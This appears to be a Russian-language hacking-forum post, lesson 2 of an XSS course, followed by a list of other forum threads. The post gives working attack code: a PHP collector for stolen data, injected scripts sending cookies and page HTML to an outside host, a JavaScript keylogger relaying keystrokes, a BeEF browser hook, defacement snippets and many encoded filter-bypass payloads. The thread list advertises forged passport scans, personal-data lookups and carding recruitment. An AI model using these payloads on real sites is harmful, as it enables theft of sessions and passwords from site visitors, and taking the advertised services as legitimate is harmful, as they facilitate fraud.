Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф

  • Автор темы klobald
  • Дата начала
K

klobald

Original poster
Кража данных с помощью XSS и их передача на удалённый сервер
Это самый популярный вариант эксплуатации XSS. Кроме уязвимости XSS на целевом веб-сайте, нам нужен свой сервер, на который будут отправляться данные. В качестве уязвимых сайтов я буду использовать различные веб-приложения из Web Security Dojo. В качестве сервера, который будет собирать данные, я буду использовать один из своих хостингов (для обучения можете описанное здесь проделывать на localhost’е, или поискать любой бесплатный хостинг с PHP, или просто купить

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.

Для приёма и показа данных я буду использовать следующий код:
Код:
<?php

 

#error_reporting(0);

 

$filename = 'log.txt';

$password = 'pass';

 

if (!file_exists($filename)) {

    if ($fh = fopen($filename, 'w')) {

        fclose($fh);

    }

}

 

if (isset($_GET['c'])) {

    $content = '[Host]: ' . $_SERVER['REMOTE_HOST'] . PHP_EOL;

    $content .= '[Remote Addr]: ' . $_SERVER['REMOTE_ADDR'] . PHP_EOL;

    $content .= '[Sensitive Information]: ' . $_GET['c'] . PHP_EOL;

    $content .= PHP_EOL . PHP_EOL;

    file_put_contents($filename, $content, FILE_APPEND | LOCK_EX);

}

 

if (isset($_GET['p'])) {

 

    if ($_GET['p'] == $password) {

        if (isset($_GET['rm'])) {

            unlink($filename);

        } else {

            $data = file_get_contents($filename);

            $convert = explode("\n", $data);

            for ($i = 0; $i < count($convert); $i++) {

                echo $convert[$i] . '</br>';

            }

        }

    }

}

Я сохранил его в файл stealer.php, вы можете выбрать любое название – но тогда не забывайте его менять в соответствующем коде JavaScript.

В строках
Код:
$filename = 'log.txt';

$password = 'pass';

Устанавливаются файл для хранения данных и пароль (pass).

Для передачи данных используется переменная c, например:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

данные


Для просмотра полученных данных:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Для очистки файла с захваченными данными:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Уязвимость мы будем эксплуатировать в приложении

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Сборщик данных я разместил по адресу

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Таким образом, внедряемый код имеет следующий вид (вам нужно заменить miloserdov.org на адрес своего домена или IP):
Код:
<script>new Image().src="http://miloserdov.org/stealer.php?c="+encodeURI(document.cookie);</script>

Размещаем:

303.jpg

Получаем результат:

304.jpg

Можно украсть весь HTML код:
Код:
<script>new Image().src=" http://miloserdov.org/stealer.php?c="+encodeURI(document.body.innerHTML);</script>


Или отдельные элементы:
Код:
<script>new Image().src=" http://miloserdov.org/stealer.php?c="+encodeURI(document.getElementById('idSystemInformationHeading').innerHTML));</script>

Кража HTML кода имеет смысл тогда, когда целевой пользователь видит на странице то, что вам недоступно.


Изменение внешнего вида сайта при помощи XSS
Подобным образом можно оставить веб-сайт без содержимого:
Код:
<script>document.body.innerHTML=""</script>

305.jpg

А так без содержимого будет только выбранный элемент:
Код:
<script>document.getElementById('idSystemInformationHeading').innerHTML=""</script>


Можно поменять содержимое сайта на своё:
Код:
<script>document.body.innerHTML="<p>Ещё один сайт о всякой фигне.</p>"</script>

306.jpg

Добавить что-то от себя:
Код:
<script>document.body.innerHTML=document.body.innerHTML+"<p>One more shitty web site.</p>"</script>


307.jpg

И делать что-угодно со стилями.


Внедрение перехватчика нажатий клавиш при XSS (килогер)
Добавление килогера (программы, которая записывает все нажатые пользователем клавиши) наиболее перспективно при хранимой уязвимости XSS. Хотя и при непостоянных XSS килогер может сделать своё дело.

Будут перехватываться все нажатые клавиши, в том числе введённые логины и пароли.

На сервере атакующего нужно создать 2 файла. Первый из них содержит JavaScript код и его роль заключается в захвате и отправке введённых данных. Второй файл на PHP, он отвечает за приём и сохранение перехваченных данных:

Исходный код exploit.js:
Код:
var keys = '';

document.onkeypress = function (e) {

    var get = window.event ? event : e;

    var key = get.keyCode ? get.keyCode : get.charCode;

    key = String.fromCharCode(key);

    keys += key;

};

window.setInterval(function () {

    new Image().src = 'http://miloserdov.org/exploit.php?keylog=' + keys;

    keys = '';

}, 1000);

Обратите внимание на строку:
Код:
new Image().src = 'http://miloserdov.org/exploit.php?keylog=' + keys;



Вместо miloserdov.org вам нужно ввести адрес хоста или IP, куда будут пересылаться перехваченные нажатия клавиш.

Второй файл exploit.php:
Код:
<?php



$password = 'pass';

 

if (!file_exists('keylog.txt')) {

    if ($fh = fopen('keylog.txt', 'w')) {

        fclose($fh);

    }

}

 

if (!empty($_GET['keylog'])) {

    $logfile = fopen('keylog.txt', 'a+');

    fwrite($logfile, $_GET['keylog']);

    fclose($logfile);

}

 

if (isset($_GET['p'])) {

 

    if ($_GET['p'] == $password) {

        if (isset($_GET['rm'])) {

            unlink('keylog.txt');

        } else {

            $data = file_get_contents('keylog.txt');

            $convert = explode("\n", $data);

            for ($i = 0; $i < count($convert); $i++) {

                echo $convert[$i] . '</br>';

            }

        }

    }

}

В нём можно ничего не менять – разве пароль установите на свой.

В сайте с имеющейся хранимой XSS мы вводим:
Код:
<script src="http://miloserdov.org/exploit.js"></script>


Обратите внимание на адрес –

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

– вам нужно заменить его на свой.

Вводим:

401.jpg



Просматриваем результат:

402.jpg



Подцепление на BeEF
Браузер является подцепленным на BeEF, если в страницу веб-сайта, которую просматривает пользователь, удалось внедрить специальный JavaScript код. XSS как раз подходят для этих целей.

Атакующий запускает BeEF на своём сервере:
Код:
sudo beef

BeEF даёт подсказку, какой файл нужно внедрять в код:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Наш код, который мы вставляем в сайт, уязвимый к XSS:
Код:
<script src="http://192.168.1.39:3000/hook.js">


Внедняем:

501.jpg

Когда кто-то посещает страницу с нашим кодом, мы видим это в панели управления BeEF:

502.jpg

Выполняем разные атаки:

503.jpg

504.jpg



Подсказки по эксплуатации XSS и обходу фильтров
Здесь собраны некоторые примеры, которые могут помочь вам обойти XSS фильтры, это может оказаться полезным в различных контекстах и может помочь вам в выполнении XSS.

Базовая полезная нагрузка XSS:
Код:
<script>alert("XSS-by-Shawar")</script>

"><script>alert("XSS-by-Shawar")</script>

"><script>alert(/XSS-by-Shawar/)</script>

Внутри тэга Script:
</script><script>alert("XSS by Shawar")</script>

");alert("xss-by-shawar");//

Обход ограничения тэга script путём замены регистра:
Код:
"><iFrAmE/src=jAvAscrIpT:alert(/xss-by-shawar/)>

"><ScRiPt>alert("xss by shawar")</sCrIpT>

XSS с использованием тэгов Image и HTML:

Работает только в Chrome
Код:
"><detials ontoggle=confirm(0)>

"><IMG SRC=x onerror=javascript:alert(&quot;XSS-by-Shawar&quot;)>

"><img onmouseover=alert(“XSS by Shawar”)>

"><test onclick=alert(/xss-by-shawar/)>clickme</test>

"><a href=javascript:alert(/xss-by-shawar/)clickme</a>

"><h1 onmouseover=alert("XSS by Shawar Khan")> hover on me</h1>

"><svg/onload=prompt("XSS by Shawar Khan")>

"><body/onload=alert("XSS by shawar")>

В контексте стилей (работает только на старых версиях IE,, например IE 8, IE 7)

Если input внутри тэга <style>:
Код:
body{xss:expression(alert("XSS by Shawar Khan"))}


Если input внутри атрибута style=" ":
Код:
xss:expression(alert(/xss-by-shawar/)


Обход фильтрации тэга script:
Код:
<<SCRIPT>alert("XSS by Shawar");//<</SCRIPT>

%253script%253ealert(/xss-by-shawar/)%253c/script%253e

"><s"%2b”cript>alert(/xss-by-shawar/)</script>

foo<script>alert(/xss-by-shawar/)</script>

<scr<script>ipt>alert(/xss-by-shawar/)</scr</script>ipt>

Продвинутая полезная нагрузка:
Код:
"><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/XSS-by-Shawar/&rpar;>ClickMe

"><h1/onclick=au006ceru0074(/xss-by-shawar/)>clickme</h1>

"><a id="a"href=javascript&colon;au006ceru0074&lpar;/xss-by-shawar/&rpar; id="xss-test">Click me</a>#a <

<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">clickme

Некоторые альтернативы полезных ключевых слов:
Код:
alert = au006ceru0074

prompt = pu0072omu0070u0074

confirm = cou006efiru006d

javascript = j&#x00041vascr&#x00069pt

: = &colon;

( = &lpar;

) = &rpar;

использование alert(/xss/) в ссылке = alert%28 /xss/%29 example: <a href="javascript:alert%28 /xss/%29">clickme

base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+


Следующий урок скоро будет
P.s: И даже не думай использовать этот урок что бы хацкнуть hhide.su:D
P.p.s: Все равно ничего не получится)
 
  • Like
Реакции: Forevonly
Название темы
Автор Заголовок Раздел Ответы Дата
K Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
K Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Ф Уроки по C# .NET 2
P Видео-Уроки по С# Полезные статьи 8
O Уроки по HTML & CSS Другие ЯП 1
MAESTRO_INFO Продам .:Maestro:. Агентство поиска и сбора любой интересующей вас информации по всей UA. Услуги частного детектива. Пробив информации/Прозвоны 0
Support81 Взлом ООН: 8Base наносит мощный удар по борцам с неравенством Новости в сети 0
El_IRBIS Интересно Руководство по тестированию Веб-Безопасности OWASP. Уязвимости и взлом 0
VPSmarket Продам vpsmarket.biz | VPS/VDS сервера по низким ценам! Сайты/Хостинг/Сервера 0
Emilio_Gaviriya Статья CVE: Подборка ресурсов по поиску уязвимостей. Уязвимости и взлом 0
Emilio_Gaviriya Как вычислить местоположение по IP-адресу? Статьи 0
Emilio_Gaviriya Статья Поиск по IoT, IP, доменам и поддоменам: 4 утилиты. Уязвимости и взлом 0
Emilio_Gaviriya Статья Гайд по SQL-инъекциям. Уязвимости и взлом 0
Black_ppss ⭐ Поиск людей для работы с команде! Вещевой карж по EU! Предоставляю работу. Ищу специалиста. 1
Support81 92% атак по email: электронная почта остается главной лазейкой для фишеров Новости в сети 0
bitwisex Инструкция по установке и настройке криптовалютного кошелька Trust Wallet Полезные статьи 0
Support81 Специалисты по кибербезопасности назвали главную угрозу для компаний в 2024 году Новости в сети 0
lonesttar Ожидает оплаты Скрипт бота по аренде виртуальных номеров + бот техподдержка! Продажа софта 0
lonesttar Ожидает оплаты Скрипт бота по аренде прокси + бот техподдержка! Продажа софта 0
A Ищем менеджера по обработке заявок. Предоставляю работу. Ищу специалиста. 1
Emilio_Gaviriya Статья Инструкция по обнаружению хоста и тестированию на проникновение. Уязвимости и взлом 0
F Вакансия: Менеджер по продажам - удаленная работа в США Предоставляю работу. Ищу специалиста. 0
Support81 Zhejiang Big Chip: китайский удар по доминированию США в сфере суперкомпьютеров Новости в сети 0
E.Alderson Ищу наставника по penetration tester Ищу работу. Предлагаю свои услуги. 0
Dany Blanco Набор в команду 2-3 человека! Вбив вещевухи по Европе. Предоставляю работу. Ищу специалиста. 0
TrashHellSoDomy Работающие методы по борьбе с гриппом типа ковида Юмор 3
SMM2040 Ожидает оплаты Рассылаем по WhatsApp | Лучшая цена | 98% Проход Ищу работу. Предлагаю свои услуги. 1
NovaBaseNova Базы на заказ. Собираем по любым направлениям! Ищу работу. Предлагаю свои услуги. 0
Ёшкин_кот Интересно Зарубежный сервис по приёму смс. (бесплатный) Свободное общение и флейм 1
Ёшкин_кот Интересно Пять способов поиска человека по открытым источникам (OSINT) Полезные статьи 2
turbion0 В России запустили переводы по СБП в пять стран. Деньги поступают мгновенно Новости в сети 0
T Куплю Куплю Вашу криптовалюту по выгодному курсу!! Куплю/Продам 0
Support81 Терпение лопнуло: Южная Корея, США и Япония объединяют усилия по борьбе с северокорейскими хакерами Новости в сети 0
C Помощь по зароботку! Предоставляю работу. Ищу специалиста. 0
Mr.Prime Ищу специалиста по деанону телеги. Есть приватный канал, нужно узнать владельца. Предоставляю работу. Ищу специалиста. 0
BillyBons Игры бесплатно для слабых ПК по прямой ссылке- rpgame1.net Другое 4
Арианна 25 книг по социальной инженерии Полезные статьи 2
I Турнир по Dota 2 и приз 10 000 руб! Присоединяйтесь будет жарко! Свободное общение и флейм 0
RefBanker Ожидает оплаты Скупка до 75% на ручных дропов | Пересыл вашего стаффа по WW | Белые лейблы UPS за 60% Куплю/Продам 1
Арианна Государственный пробив по РФ Ищу работу. Предлагаю свои услуги. 0
mrpink Продам Качественные сканы РФ паспортов по доступным ценам. Отрисовка документов Аккаунты/Админки/Документы 0
mrpink Ищу сотрудников салонов Связной, Мегафон и Contact для работы по верификациям кошельков Qiwi и Юмани Предоставляю работу. Ищу специалиста. 0
U Usersbox — OSINT бот по пробиву людей и поиску информации Корзина 0
G Требуется АРТ- АГЕНТ по продаже на eBay , Аmazon и др. Копии картин знаменитых Корзина 0
JustTG Ожидает оплаты Just-tg.com | Сервис по продвижению каналов и ботов в TELEGRAM | Прямой поставщик 24/7 Ищу работу. Предлагаю свои услуги. 1
M Пробив от секретной службы Mossad (ПРОБИВ по всем структурам, комплексные решения под ваш запрос) Корзина 0
Support81 Шантаж, клевета, угрозы расправы? Обычный рабочий день специалиста по кибербезопасности Новости в сети 1
Support81 Интересно Алгоритм работы СБ Сбербанка по антифроду. Карты/CC/Банки/Enroll 0
Support81 Юные британские хакеры взломали десятки организаций по всему миру, как им это удалось? Новости в сети 0
E На проверке Сервис №1 по продаже ГОСУСЛУГ и документов под МФО, БК, КИВИ и пр. / бот автопродаж / Все что не подошло по разделу 1

Название темы